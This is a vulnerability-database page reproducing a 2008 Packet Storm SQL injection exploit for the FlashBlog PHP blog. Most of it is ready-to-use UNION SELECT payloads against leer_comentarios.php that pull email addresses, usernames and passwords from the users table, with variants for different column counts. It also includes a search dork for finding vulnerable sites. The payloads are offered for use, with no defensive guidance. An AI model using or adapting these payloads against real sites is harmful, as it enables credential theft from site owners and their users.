Lucene search

K

flashblog-sql.txt

🗓️ 29 May 2008 00:00:00Reported by HER0Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

FlashBlog sql Injection exploit for reading user credential

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`###############################################################################  
#  
# Name : FlashBlog sql Inyeccion  
# Author : Her0  
# Dork : "flashblog", allinurl:flashblog.html  
# Greetz : Komtec1,Freak,Knet,Boer,ka0x  
#  
###############################################################################  
  
Proof of Concept :  
  
http://[host]/[path]//php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17/**/from/**/usuarios/*  
  
  
The colums from host to host are diferent: all resolve =D  
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/usuarios/*  
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/from/**/usuarios/*  
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19/**/from/**/usuarios/*  
  
  
###############################################################################  
#  
# Mexico 2008, Thanks all my friends, I love the whisky xD  
#  
###############################################################################  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
29 May 2008 00:00Current
7.4High risk
Vulners AI Score7.4
31
.json
Report